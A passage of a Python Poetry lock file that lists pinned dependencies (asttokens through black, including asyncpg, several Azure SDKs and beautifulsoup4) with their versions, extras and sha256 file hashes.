"asttokens-2.4.1-py2.py3-none-any.whl", hash = "sha256:051ed49c3dcae8913ea7cd08e46a606dba30b79993209636c4875bc1d637bc24"}, {file = "asttokens-2.4.1.tar.gz", hash = "sha256:b03869718ba9a6eb027e134bfdf69f38a236d681c83c160d510768af11254ba0"}, ] [package.dependencies] six = ">=1.12.0" [package.extras] astroid = ["astroid (>=1,<2)", "astroid (>=2,<4)"] test = ["astroid 
(>=1,<2)", "astroid (>=2,<4)", "pytest"] [[package]] name = "astunparse" version = "1.6.3" description = "An AST unparser for Python" optional = true python-versions = "*" files = [ {file = "astunparse-1.6.3-py2.py3-none-any.whl", hash = "sha256:c2652417f2c8b5bb325c885ae329bdf3f86424075c4fd1a128674bc6fba4b8e8"}, {file = "astunparse-1.6.3.tar.gz", hash = "sha256:5ad93a8456f0d084c3456d059fd9a92cce667963232cbf763eac3bc5b7940872"}, ] [package.dependencies] six = ">=1.6.1,<2.0" wheel = ">=0.23.0,<1.0" [[package]] name = "async-lru" version = "2.0.4" description = "Simple LRU cache for asyncio" optional = false python-versions = ">=3.8" files = [ {file = "async-lru-2.0.4.tar.gz", hash = "sha256:b8a59a5df60805ff63220b2a0c5b5393da5521b113cd5465a44eb037d81a5627"}, {file = "async_lru-2.0.4-py3-none-any.whl", hash = "sha256:ff02944ce3c288c5be660c42dbcca0742b32c3b279d6dceda655190240b99224"}, ] [package.dependencies] typing-extensions = {version = ">=4.0.0", markers = "python_version < \"3.11\""} [[package]] name = "async-timeout" version = "4.0.3" description = "Timeout context manager for asyncio programs" optional = false python-versions = ">=3.7" files = [ {file = "async-timeout-4.0.3.tar.gz", hash = "sha256:4640d96be84d82d02ed59ea2b7105a0f7b33abe8703703cd0ab0bf87c427522f"}, {file = "async_timeout-4.0.3-py3-none-any.whl", hash = "sha256:7405140ff1230c310e51dc27b3145b9092d659ce68ff733fb0cefe3ee42be028"}, ] [[package]] name = "asyncpg" version = "0.28.0" description = "An asyncio PostgreSQL driver" optional = true python-versions = ">=3.7.0" files = [ {file = "asyncpg-0.28.0-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:0a6d1b954d2b296292ddff4e0060f494bb4270d87fb3655dd23c5c6096d16d83"}, {file = "asyncpg-0.28.0-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:0740f836985fd2bd73dca42c50c6074d1d61376e134d7ad3ad7566c4f79f8184"}, {file = "asyncpg-0.28.0-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:e907cf620a819fab1737f2dd90c0f185e2a796f139ac7de6aa3212a8af96c050"}, {file = "asyncpg-0.28.0-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:86b339984d55e8202e0c4b252e9573e26e5afa05617ed02252544f7b3e6de3e9"}, {file = "asyncpg-0.28.0-cp310-cp310-musllinux_1_1_aarch64.whl", hash = "sha256:0c402745185414e4c204a02daca3d22d732b37359db4d2e705172324e2d94e85"}, {file = "asyncpg-0.28.0-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:c88eef5e096296626e9688f00ab627231f709d0e7e3fb84bb4413dff81d996d7"}, {file = "asyncpg-0.28.0-cp310-cp310-win32.whl", hash = "sha256:90a7bae882a9e65a9e448fdad3e090c2609bb4637d2a9c90bfdcebbfc334bf89"}, {file = "asyncpg-0.28.0-cp310-cp310-win_amd64.whl", hash = "sha256:76aacdcd5e2e9999e83c8fbcb748208b60925cc714a578925adcb446d709016c"}, {file = "asyncpg-0.28.0-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:a0e08fe2c9b3618459caaef35979d45f4e4f8d4f79490c9fa3367251366af207"}, {file = "asyncpg-0.28.0-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:b24e521f6060ff5d35f761a623b0042c84b9c9b9fb82786aadca95a9cb4a893b"}, {file = "asyncpg-0.28.0-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:99417210461a41891c4ff301490a8713d1ca99b694fef05dabd7139f9d64bd6c"}, {file = "asyncpg-0.28.0-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:f029c5adf08c47b10bcdc857001bbef551ae51c57b3110964844a9d79ca0f267"}, {file = "asyncpg-0.28.0-cp311-cp311-musllinux_1_1_aarch64.whl", hash = "sha256:ad1d6abf6c2f5152f46fff06b0e74f25800ce8ec6c80967f0bc789974de3c652"}, {file = 
"asyncpg-0.28.0-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:d7fa81ada2807bc50fea1dc741b26a4e99258825ba55913b0ddbf199a10d69d8"}, {file = "asyncpg-0.28.0-cp311-cp311-win32.whl", hash = "sha256:f33c5685e97821533df3ada9384e7784bd1e7865d2b22f153f2e4bd4a083e102"}, {file = "asyncpg-0.28.0-cp311-cp311-win_amd64.whl", hash = "sha256:5e7337c98fb493079d686a4a6965e8bcb059b8e1b8ec42106322fc6c1c889bb0"}, {file = "asyncpg-0.28.0-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:1c56092465e718a9fdcc726cc3d9dcf3a692e4834031c9a9f871d92a75d20d48"}, {file = "asyncpg-0.28.0-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:4acd6830a7da0eb4426249d71353e8895b350daae2380cb26d11e0d4a01c5472"}, {file = "asyncpg-0.28.0-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:63861bb4a540fa033a56db3bb58b0c128c56fad5d24e6d0a8c37cb29b17c1c7d"}, {file = "asyncpg-0.28.0-cp37-cp37m-musllinux_1_1_aarch64.whl", hash = "sha256:a93a94ae777c70772073d0512f21c74ac82a8a49be3a1d982e3f259ab5f27307"}, {file = "asyncpg-0.28.0-cp37-cp37m-musllinux_1_1_x86_64.whl", hash = "sha256:d14681110e51a9bc9c065c4e7944e8139076a778e56d6f6a306a26e740ed86d2"}, {file = "asyncpg-0.28.0-cp37-cp37m-win32.whl", hash = "sha256:8aec08e7310f9ab322925ae5c768532e1d78cfb6440f63c078b8392a38aa636a"}, {file = "asyncpg-0.28.0-cp37-cp37m-win_amd64.whl", hash = "sha256:319f5fa1ab0432bc91fb39b3960b0d591e6b5c7844dafc92c79e3f1bff96abef"}, {file = "asyncpg-0.28.0-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:b337ededaabc91c26bf577bfcd19b5508d879c0ad009722be5bb0a9dd30b85a0"}, {file = "asyncpg-0.28.0-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:4d32b680a9b16d2957a0a3cc6b7fa39068baba8e6b728f2e0a148a67644578f4"}, {file = "asyncpg-0.28.0-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:f4f62f04cdf38441a70f279505ef3b4eadf64479b17e707c950515846a2df197"}, {file = "asyncpg-0.28.0-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:4f20cac332c2576c79c2e8e6464791c1f1628416d1115935a34ddd7121bfc6a4"}, {file = "asyncpg-0.28.0-cp38-cp38-musllinux_1_1_aarch64.whl", hash = "sha256:59f9712ce01e146ff71d95d561fb68bd2d588a35a187116ef05028675462d5ed"}, {file = "asyncpg-0.28.0-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:fc9e9f9ff1aa0eddcc3247a180ac9e9b51a62311e988809ac6152e8fb8097756"}, {file = "asyncpg-0.28.0-cp38-cp38-win32.whl", hash = "sha256:9e721dccd3838fcff66da98709ed884df1e30a95f6ba19f595a3706b4bc757e3"}, {file = "asyncpg-0.28.0-cp38-cp38-win_amd64.whl", hash = "sha256:8ba7d06a0bea539e0487234511d4adf81dc8762249858ed2a580534e1720db00"}, {file = "asyncpg-0.28.0-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:d009b08602b8b18edef3a731f2ce6d3f57d8dac2a0a4140367e194eabd3de457"}, {file = "asyncpg-0.28.0-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:ec46a58d81446d580fb21b376ec6baecab7288ce5a578943e2fc7ab73bf7eb39"}, {file = "asyncpg-0.28.0-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:7b48ceed606cce9e64fd5480a9b0b9a95cea2b798bb95129687abd8599c8b019"}, {file = "asyncpg-0.28.0-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:8858f713810f4fe67876728680f42e93b7e7d5c7b61cf2118ef9153ec16b9423"}, {file = "asyncpg-0.28.0-cp39-cp39-musllinux_1_1_aarch64.whl", hash = "sha256:5e18438a0730d1c0c1715016eacda6e9a505fc5aa931b37c97d928d44941b4bf"}, {file = "asyncpg-0.28.0-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:e9c433f6fcdd61c21a715ee9128a3ca48be8ac16fa07be69262f016bb0f4dbd2"}, {file = 
"asyncpg-0.28.0-cp39-cp39-win32.whl", hash = "sha256:41e97248d9076bc8e4849da9e33e051be7ba37cd507cbd51dfe4b2d99c70e3dc"}, {file = "asyncpg-0.28.0-cp39-cp39-win_amd64.whl", hash = "sha256:3ed77f00c6aacfe9d79e9eff9e21729ce92a4b38e80ea99a58ed382f42ebd55b"}, {file = "asyncpg-0.28.0.tar.gz", hash = "sha256:7252cdc3acb2f52feaa3664280d3bcd78a46bd6c10bfd681acfffefa1120e278"}, ] [package.extras] docs = ["Sphinx (>=5.3.0,<5.4.0)", "sphinx-rtd-theme (>=1.2.2)", "sphinxcontrib-asyncio (>=0.3.0,<0.4.0)"] test = ["flake8 (>=5.0,<6.0)", "uvloop (>=0.15.3)"] [[package]] name = "atlassian-python-api" version = "3.41.3" description = "Python Atlassian REST API Wrapper" optional = true python-versions = "*" files = [ {file = "atlassian-python-api-3.41.3.tar.gz", hash = "sha256:a29aae8f456babe125e3371a0355018e9c1d37190333efc312bd81163bd96ffd"}, {file = "atlassian_python_api-3.41.3-py3-none-any.whl", hash = "sha256:7661d3ce3c80e887a7e5ec1c61c1e37d3eaacb4857e377b38ef4084d0f067757"}, ] [package.dependencies] deprecated = "*" oauthlib = "*" requests = "*" requests-oauthlib = "*" six = "*" [package.extras] kerberos = ["requests-kerberos"] [[package]] name = "attr" version = "0.3.2" description = "Simple decorator to set attributes of target function or class in a DRY way." optional = true python-versions = "*" files = [ {file = "attr-0.3.2-py2.py3-none-any.whl", hash = "sha256:4f4bffeea8c27387bde446675a7ac24f3b8fea1075f12d849b5f5c5181fc8336"}, {file = "attr-0.3.2.tar.gz", hash = "sha256:1ceebca768181cdcce9827611b1d728e592be5d293911539ea3d0b0bfa1146f4"}, ] [[package]] name = "attrs" version = "23.1.0" description = "Classes Without Boilerplate" optional = false python-versions = ">=3.7" files = [ {file = "attrs-23.1.0-py3-none-any.whl", hash = "sha256:1f28b4522cdc2fb4256ac1a020c78acf9cba2c6b461ccd2c126f3aa8e8335d04"}, {file = "attrs-23.1.0.tar.gz", hash = "sha256:6279836d581513a26f1bf235f9acd333bc9115683f14f7e8fae46c98fc50e015"}, ] [package.extras] cov = ["attrs[tests]", "coverage[toml] (>=5.3)"] dev = ["attrs[docs,tests]", "pre-commit"] docs = ["furo", "myst-parser", "sphinx", "sphinx-notfound-page", "sphinxcontrib-towncrier", "towncrier", "zope-interface"] tests = ["attrs[tests-no-zope]", "zope-interface"] tests-no-zope = ["cloudpickle", "hypothesis", "mypy (>=1.1.1)", "pympler", "pytest (>=4.3.0)", "pytest-mypy-plugins", "pytest-xdist[psutil]"] [[package]] name = "audioread" version = "3.0.1" description = "Multi-library, cross-platform audio decoding." optional = true python-versions = ">=3.6" files = [ {file = "audioread-3.0.1-py3-none-any.whl", hash = "sha256:4cdce70b8adc0da0a3c9e0d85fb10b3ace30fbdf8d1670fd443929b61d117c33"}, {file = "audioread-3.0.1.tar.gz", hash = "sha256:ac5460a5498c48bdf2e8e767402583a4dcd13f4414d286f42ce4379e8b35066d"}, ] [package.extras] test = ["tox"] [[package]] name = "authlib" version = "1.2.1" description = "The ultimate Python library in building OAuth and OpenID Connect servers and clients." 
optional = true
python-versions = "*"
files = [
    {file = "Authlib-1.2.1-py2.py3-none-any.whl", hash = "sha256:c88984ea00149a90e3537c964327da930779afa4564e354edfd98410bea01911"},
    {file = "Authlib-1.2.1.tar.gz", hash = "sha256:421f7c6b468d907ca2d9afede256f068f87e34d23dd221c07d13d4c234726afb"},
]

[package.dependencies]
cryptography = ">=3.2"

[[package]]
name = "awadb"
version = "0.3.10"
description = "AI Native database for embedding vectors"
optional = true
python-versions = ">=3.7"
files = [
    {file = "awadb-0.3.10-cp310-cp310-macosx_10_13_x86_64.whl", hash = "sha256:1149b1c6fee95bd6e0f7ff625de060db679ea3985cad2332028eb50a76b9726e"},
    {file = "awadb-0.3.10-cp310-cp310-macosx_13_0_arm64.whl", hash = "sha256:a447894ed721184a680566ac8584154d6801d1f99e98996c1d4bd198c022aa07"},
    {file = "awadb-0.3.10-cp310-cp310-manylinux1_x86_64.whl", hash = "sha256:ab21a90930f58e666a6874618813cc32a93b1e2fd4e66901c9e5392844165034"},
    {file = "awadb-0.3.10-cp311-cp311-macosx_10_13_x86_64.whl", hash = "sha256:bfa1b64dfb9b77710180be9b2971afa6e19608bad54460b819131c2d24efa4f4"},
    {file = "awadb-0.3.10-cp311-cp311-macosx_13_0_arm64.whl", hash = "sha256:45a3094119ca3ee1a04abf23a9c22a14bb06cd938a128b28de423031b471787f"},
    {file = "awadb-0.3.10-cp311-cp311-manylinux1_x86_64.whl", hash = "sha256:5a8f532621e4e551cdf4ccf0fcfb3a31d3be4d4fe262b26ba7bd7ff769722c9c"},
    {file = "awadb-0.3.10-cp37-cp37m-macosx_10_13_x86_64.whl", hash = "sha256:52480a9589e564fb03f504fb2eb26a27fcf552129725fd25a458b0db7d56fde5"},
    {file = "awadb-0.3.10-cp37-cp37m-manylinux1_x86_64.whl", hash = "sha256:d38a1fb571a6e708218c00ec08ffc2b136f9eba8d4308f3d8ed1a3dc89fcdef6"},
    {file = "awadb-0.3.10-cp38-cp38-macosx_10_13_x86_64.whl", hash = "sha256:d0e9f2ecb943ea6ba3ccbb849ef79f814fd59efee7d4c698a5220bc3ce308457"},
    {file = "awadb-0.3.10-cp38-cp38-macosx_13_0_arm64.whl", hash = "sha256:fb4ab07c75bc3a92be9db2241551f60d705b18bcd48af95d57977084477647d9"},
    {file = "awadb-0.3.10-cp38-cp38-manylinux1_x86_64.whl", hash = "sha256:157a1f64e8ad3a28cc7cc5a22d39d0703121b1088db46d02adae23ea41a0346c"},
    {file = "awadb-0.3.10-cp39-cp39-macosx_10_13_x86_64.whl", hash = "sha256:afad9bec8a0b183de77210cff12fef7d61f8f524cdfd6c0f4c440f7fea763e30"},
    {file = "awadb-0.3.10-cp39-cp39-macosx_13_0_arm64.whl", hash = "sha256:71c084197abff80addf3568457a561df54db4bcaf13244f98b68d5fb32d9c2b0"},
    {file = "awadb-0.3.10-cp39-cp39-manylinux1_x86_64.whl", hash = "sha256:cc9212d8ab743331329b225a594eaa64918e32a06046373bc07821f8e9aa423e"},
]

[package.extras]
test = ["pytest (>=6.0)"]

[[package]]
name = "azure-ai-formrecognizer"
version = "3.3.1"
description = "Microsoft Azure Form Recognizer Client Library for Python"
optional = true
python-versions = ">=3.7"
files = [
    {file = "azure-ai-formrecognizer-3.3.1.tar.gz", hash = "sha256:bd5f764cc438529589a4e7d2955a22a0883c7cdce291cf14a53a0d9079c3427b"},
    {file = "azure_ai_formrecognizer-3.3.1-py3-none-any.whl", hash = "sha256:761612eb454eb866dc143281ad7ba3169e56f43f8f246b72c8429edd181e5e77"},
]

[package.dependencies]
azure-common = ">=1.1,<2.0"
azure-core = ">=1.23.0,<2.0.0"
msrest = ">=0.6.21"
typing-extensions = ">=4.0.1"

[[package]]
name = "azure-ai-vision"
version = "0.11.1b1"
description = "Microsoft Azure AI Vision SDK for Python"
optional = true
python-versions = ">=3.7"
files = [
    {file = "azure_ai_vision-0.11.1b1-py3-none-manylinux1_x86_64.whl", hash = "sha256:6f8563ae26689da6cdee9b2de009a53546ae2fd86c6c180236ce5da5b45f41d3"},
    {file = "azure_ai_vision-0.11.1b1-py3-none-win_amd64.whl", hash = "sha256:f5df03b9156feaa1d8c776631967b1455028d30dfd4cd1c732aa0f9c03d01517"},
]

[[package]]
name = "azure-cognitiveservices-speech"
version = "1.32.1"
description = "Microsoft Cognitive Services Speech SDK for Python"
optional = true
python-versions = ">=3.7"
files = [
    {file = "azure_cognitiveservices_speech-1.32.1-py3-none-macosx_10_14_x86_64.whl", hash = "sha256:26aa55eb5430f842a1da20dee6c3efe59d27c4209025c579efa63aa438f26298"},
    {file = "azure_cognitiveservices_speech-1.32.1-py3-none-macosx_11_0_arm64.whl", hash = "sha256:bb3ddca7f6f001d5e807a79c85e7b7553eb99930752a002216fcd344be5da96c"},
    {file = "azure_cognitiveservices_speech-1.32.1-py3-none-manylinux1_x86_64.whl", hash = "sha256:822b411165cbcf7799967f4858df4258ed6d9836506e93b5c7dda2255b29e7bc"},
    {file = "azure_cognitiveservices_speech-1.32.1-py3-none-manylinux2014_aarch64.whl", hash = "sha256:27d75095c12077b334fcb35a615d066703ce52adf414a2ccef3f5f402af07138"},
    {file = "azure_cognitiveservices_speech-1.32.1-py3-none-win32.whl", hash = "sha256:8ae7dfee8d4d7bc8a4cea585ed223a12878751452ed493f8c80fbc34502096c6"},
    {file = "azure_cognitiveservices_speech-1.32.1-py3-none-win_amd64.whl", hash = "sha256:cdb06dd9fe41a7f05fefec99af59630a90ad2da9f61216160410070c2e309948"},
]

[[package]]
name = "azure-common"
version = "1.1.28"
description = "Microsoft Azure Client Library for Python (Common)"
optional = true
python-versions = "*"
files = [
    {file = "azure-common-1.1.28.zip", hash = "sha256:4ac0cd3214e36b6a1b6a442686722a5d8cc449603aa833f3f0f40bda836704a3"},
    {file = "azure_common-1.1.28-py2.py3-none-any.whl", hash = "sha256:5c12d3dcf4ec20599ca6b0d3e09e86e146353d443e7fcc050c9a19c1f9df20ad"},
]

[[package]]
name = "azure-core"
version = "1.29.5"
description = "Microsoft Azure Core Library for Python"
optional = true
python-versions = ">=3.7"
files = [
    {file = "azure-core-1.29.5.tar.gz", hash = "sha256:52983c89d394c6f881a121e5101c5fa67278ca3b1f339c8fb2ef39230c70e9ac"},
    {file = "azure_core-1.29.5-py3-none-any.whl", hash = "sha256:0fa04b7b1f7d44a4fb8468c4093deb2ea01fdf4faddbf802ed9205615f99d68c"},
]

[package.dependencies]
requests = ">=2.18.4"
six = ">=1.11.0"
typing-extensions = ">=4.6.0"

[package.extras]
aio = ["aiohttp (>=3.0)"]

[[package]]
name = "azure-cosmos"
version = "4.5.1"
description = "Microsoft Azure Cosmos Client Library for Python"
optional = true
python-versions = ">=3.6"
files = [
    {file = "azure-cosmos-4.5.1.tar.gz", hash = "sha256:c4ada8381306eec413c01bc50a778e264dc3f4fafa9d696f9df8436148d2aea8"},
    {file = "azure_cosmos-4.5.1-py3-none-any.whl", hash = "sha256:3557570cf7197f50c5b11e655c1fbb1ddf433adc94f91381d671cfad8e2d7bdf"},
]

[package.dependencies]
azure-core = ">=1.23.0,<2.0.0"

[[package]]
name = "azure-identity"
version = "1.15.0"
description = "Microsoft Azure Identity Library for Python"
optional = true
python-versions = ">=3.7"
files = [
    {file = "azure-identity-1.15.0.tar.gz", hash = "sha256:4c28fc246b7f9265610eb5261d65931183d019a23d4b0e99357facb2e6c227c8"},
    {file = "azure_identity-1.15.0-py3-none-any.whl", hash = "sha256:a14b1f01c7036f11f148f22cd8c16e05035293d714458d6b44ddf534d93eb912"},
]

[package.dependencies]
azure-core = ">=1.23.0,<2.0.0"
cryptography = ">=2.5"
msal = ">=1.24.0,<2.0.0"
msal-extensions = ">=0.3.0,<2.0.0"

[[package]]
name = "azure-search-documents"
version = "11.4.0b8"
description = "Microsoft Azure Cognitive Search Client Library for Python"
optional = true
python-versions = ">=3.7"
files = [
    {file = "azure-search-documents-11.4.0b8.zip", hash = "sha256:b178ff52918590191a9cb7f411a9ab3cb517663666a501a3e84b715d19b0d93b"},
    {file = "azure_search_documents-11.4.0b8-py3-none-any.whl", hash = "sha256:4137daa2db75bff9484d394c16c0604822a51281cad2f50e11d7c48dd8d4b4cf"},
]

[package.dependencies]
azure-common = ">=1.1,<2.0"
azure-core = ">=1.24.0,<2.0.0"
isodate = ">=0.6.0"

[[package]]
name = "babel"
version = "2.13.1"
description = "Internationalization utilities"
optional = false
python-versions = ">=3.7"
files = [
    {file = "Babel-2.13.1-py3-none-any.whl", hash = "sha256:7077a4984b02b6727ac10f1f7294484f737443d7e2e66c5e4380e41a3ae0b4ed"},
    {file = "Babel-2.13.1.tar.gz", hash = "sha256:33e0952d7dd6374af8dbf6768cc4ddf3ccfefc244f9986d4074704f2fbd18900"},
]

[package.dependencies]
pytz = {version = ">=2015.7", markers = "python_version < \"3.9\""}
setuptools = {version = "*", markers = "python_version >= \"3.12\""}

[package.extras]
dev = ["freezegun (>=1.0,<2.0)", "pytest (>=6.0)", "pytest-cov"]

[[package]]
name = "backcall"
version = "0.2.0"
description = "Specifications for callback functions passed in to an API"
optional = false
python-versions = "*"
files = [
    {file = "backcall-0.2.0-py2.py3-none-any.whl", hash = "sha256:fbbce6a29f263178a1f7915c1940bde0ec2b2a967566fe1c65c1dfb7422bd255"},
    {file = "backcall-0.2.0.tar.gz", hash = "sha256:5cbdbf27be5e7cfadb448baf0aa95508f91f2bbc6c6437cd9cd06e2a4c215e1e"},
]

[[package]]
name = "backoff"
version = "2.2.1"
description = "Function decoration for backoff and retry"
optional = true
python-versions = ">=3.7,<4.0"
files = [
    {file = "backoff-2.2.1-py3-none-any.whl", hash = "sha256:63579f9a0628e06278f7e47b7d7d5b6ce20dc65c5e96a6f3ca99a6adca0396e8"},
    {file = "backoff-2.2.1.tar.gz", hash = "sha256:03f829f5bb1923180821643f8753b0502c3b682293992485b0eef2807afa5cba"},
]

[[package]]
name = "backports-zoneinfo"
version = "0.2.1"
description = "Backport of the standard library zoneinfo module"
optional = true
python-versions = ">=3.6"
files = [
    {file = "backports.zoneinfo-0.2.1-cp36-cp36m-macosx_10_14_x86_64.whl", hash = "sha256:da6013fd84a690242c310d77ddb8441a559e9cb3d3d59ebac9aca1a57b2e18bc"},
    {file = "backports.zoneinfo-0.2.1-cp36-cp36m-manylinux1_i686.whl", hash = "sha256:89a48c0d158a3cc3f654da4c2de1ceba85263fafb861b98b59040a5086259722"},
    {file = "backports.zoneinfo-0.2.1-cp36-cp36m-manylinux1_x86_64.whl", hash = "sha256:1c5742112073a563c81f786e77514969acb58649bcdf6cdf0b4ed31a348d4546"},
    {file = "backports.zoneinfo-0.2.1-cp36-cp36m-win32.whl", hash = "sha256:e8236383a20872c0cdf5a62b554b27538db7fa1bbec52429d8d106effbaeca08"},
    {file = "backports.zoneinfo-0.2.1-cp36-cp36m-win_amd64.whl", hash = "sha256:8439c030a11780786a2002261569bdf362264f605dfa4d65090b64b05c9f79a7"},
    {file = "backports.zoneinfo-0.2.1-cp37-cp37m-macosx_10_14_x86_64.whl", hash = "sha256:f04e857b59d9d1ccc39ce2da1021d196e47234873820cbeaad210724b1ee28ac"},
    {file = "backports.zoneinfo-0.2.1-cp37-cp37m-manylinux1_i686.whl", hash = "sha256:17746bd546106fa389c51dbea67c8b7c8f0d14b5526a579ca6ccf5ed72c526cf"},
    {file = "backports.zoneinfo-0.2.1-cp37-cp37m-manylinux1_x86_64.whl", hash = "sha256:5c144945a7752ca544b4b78c8c41544cdfaf9786f25fe5ffb10e838e19a27570"},
    {file = "backports.zoneinfo-0.2.1-cp37-cp37m-win32.whl", hash = "sha256:e55b384612d93be96506932a786bbcde5a2db7a9e6a4bb4bffe8b733f5b9036b"},
    {file = "backports.zoneinfo-0.2.1-cp37-cp37m-win_amd64.whl", hash = "sha256:a76b38c52400b762e48131494ba26be363491ac4f9a04c1b7e92483d169f6582"},
    {file = "backports.zoneinfo-0.2.1-cp38-cp38-macosx_10_14_x86_64.whl", hash = "sha256:8961c0f32cd0336fb8e8ead11a1f8cd99ec07145ec2931122faaac1c8f7fd987"},
    {file = "backports.zoneinfo-0.2.1-cp38-cp38-manylinux1_i686.whl", hash = "sha256:e81b76cace8eda1fca50e345242ba977f9be6ae3945af8d46326d776b4cf78d1"},
    {file = "backports.zoneinfo-0.2.1-cp38-cp38-manylinux1_x86_64.whl", hash = "sha256:7b0a64cda4145548fed9efc10322770f929b944ce5cee6c0dfe0c87bf4c0c8c9"},
    {file = "backports.zoneinfo-0.2.1-cp38-cp38-win32.whl", hash = "sha256:1b13e654a55cd45672cb54ed12148cd33628f672548f373963b0bff67b217328"},
    {file = "backports.zoneinfo-0.2.1-cp38-cp38-win_amd64.whl", hash = "sha256:4a0f800587060bf8880f954dbef70de6c11bbe59c673c3d818921f042f9954a6"},
    {file = "backports.zoneinfo-0.2.1.tar.gz", hash = "sha256:fadbfe37f74051d024037f223b8e001611eac868b5c5b06144ef4d8b799862f2"},
]

[package.extras]
tzdata = ["tzdata"]

[[package]]
name = "beautifulsoup4"
version = "4.12.2"
description = "Screen-scraping library"
optional = false
python-versions = ">=3.6.0"
files = [
    {file = "beautifulsoup4-4.12.2-py3-none-any.whl", hash = "sha256:bd2520ca0d9d7d12694a53d44ac482d181b4ec1888909b035a3dbf40d0f57d4a"},
    {file = "beautifulsoup4-4.12.2.tar.gz", hash = "sha256:492bbc69dca35d12daac71c4db1bfff0c876c00ef4a2ffacce226d4638eb72da"},
]

[package.dependencies]
soupsieve = ">1.2"

[package.extras]
html5lib = ["html5lib"]
lxml = ["lxml"]

[[package]]
name = "bibtexparser"
version = "1.4.1"
description = "Bibtex parser for python 3"
optional = true
python-versions = "*"
files = [
    {file = "bibtexparser-1.4.1.tar.gz", hash = "sha256:e00e29e24676c4808e0b4333b37bb55cca9cbb7871a56f63058509281588d789"},
]

[package.dependencies]
pyparsing = ">=2.0.3"

[[package]]
name = "black"
version = "23.10.1"
description = "The uncompromising code formatter."
optional = false
python-versions = ">=3.8"
files = [
    {file = "black-23.10.1-cp310-cp310-macosx_10_16_arm64.whl", hash = "sha256:ec3f8e6234c4e46ff9e16d9ae96f4ef69fa328bb4ad08198c8cee45bb1f08c69"},
    {file = "black-23.10.1-cp310-cp310-macosx_10_16_x86_64.whl", hash = "sha256:1b917a2aa020ca600483a7b340c165970b26e9029067f019e3755b56e8dd5916"},
    {file = "black-23.10.1-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:9c74de4c77b849e6359c6f01987e94873c707098322b91490d24296f66d067dc"},
    {file = "black-23.10.1-cp310-cp310-win_amd64.whl", hash = "sha256:7b4d10b0f016616a0d93d24a448100adf1699712fb7a4efd0e2c32bbb219b173"},
    {file = "black-23.10.1-cp311-cp311-macosx_10_16_arm64.whl", hash = "sha256:b15b75fc53a2fbcac8a87d3e20f69874d161beef13954747e053bca7a1ce53a0"},
    {file = "black-23.10.1-cp311-cp311-macosx_10_16_x86_64.whl", hash = "sha256:e293e4c2f4a992b980032bbd62df07c1bcff82d6964d6c9496f2cd726e246ace"},
    {file = "black-23.10.1-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:7d56124b7a61d092cb52cce34182a5280e160e6aff3137172a68c2c2c4b76bcb"},
    {file = "black-23.10.1-cp311-cp311-win_amd64.whl", hash = "sha256:3f157a8945a7b2d424da3335f7ace89c14a3b0625e6593d21139c2d8214d55ce"},
    {file = "black-23.10.1-cp38-cp38-macosx_10_16_arm64.whl", hash = "sha256:cfcce6f0a384d0da692119f2d72d79ed07c7159879d0bb1bb32d2e443382bf3a"},
    {file = "black-23.10.1-cp38-cp38-macosx_10_16_x86_64.whl", hash = "sha256:33d40f5b06be80c1bbce17b173cda17994fbad096ce60eb22054da021bf933d1"},
    {file = "black-23.10.1-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:840015166dbdfbc47992871325799fd2dc0dcf9395e401ada6d88fe11498abad"},
    {file = "black-23.10.1-cp38-cp38-win_amd64.whl", hash = "sha256:037e9b4664cafda5f025a1728c50a9e9aedb99a759c89f760bd83730e76ba884"},
    {file = "black-23.10.1-cp39-cp39-macosx_10_16_arm64.whl", hash = "sha256:7cb5936e686e782fddb1c73f8aa6f459e1ad38a6a7b0e54b403f1f05a1507ee9"},
    {file = "black-23.10.1-cp39-cp39-macosx_10_16_x86_64.whl", hash = "sha256:7670242e90dc129c539e9ca17665e39a146a761e681805c54fbd86015c7c84f7"},
    {file = "black-23.10.1-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:5ed45ac9a613fb52dad3b61c8dea2ec9510bf3108d4db88422bacc7d1ba1243d"},
    {file = "black-23.10.1-cp39-cp39-win_amd64.whl", hash = "sha256:6d23d7822140e3fef190734216cefb262521789367fbdc0b3f22af6744058982"},
    {file = "black-23.10.1-py3-none-any.whl", hash = "sha256:d431e6739f727bb2e0495df64a6c7a5310758e87505f5f8cde9ff6c0f2d7e4fe"},
    {file = "black-23.10.1.tar.gz", hash = "sha256:1f8ce316753428ff68749c65a5f7844631aa18c8679dfd3ca9dc1a289979c258"},
]

[package.dependencies]
click = ">=8.0.0"
mypy-extensions = ">=0.4.3"
packaging = ">=22.0"
pathspec = ">=0.9.0"
platformdirs = ">=2"
tomli = {version = ">=1.1.0", markers = "python_version < \"3.11\""}
typing-extensions = {version = ">=4.0.1", markers = "python_version < \"3.11\""}

[package.extras]
colorama = ["colorama (>=0.4.3)"]
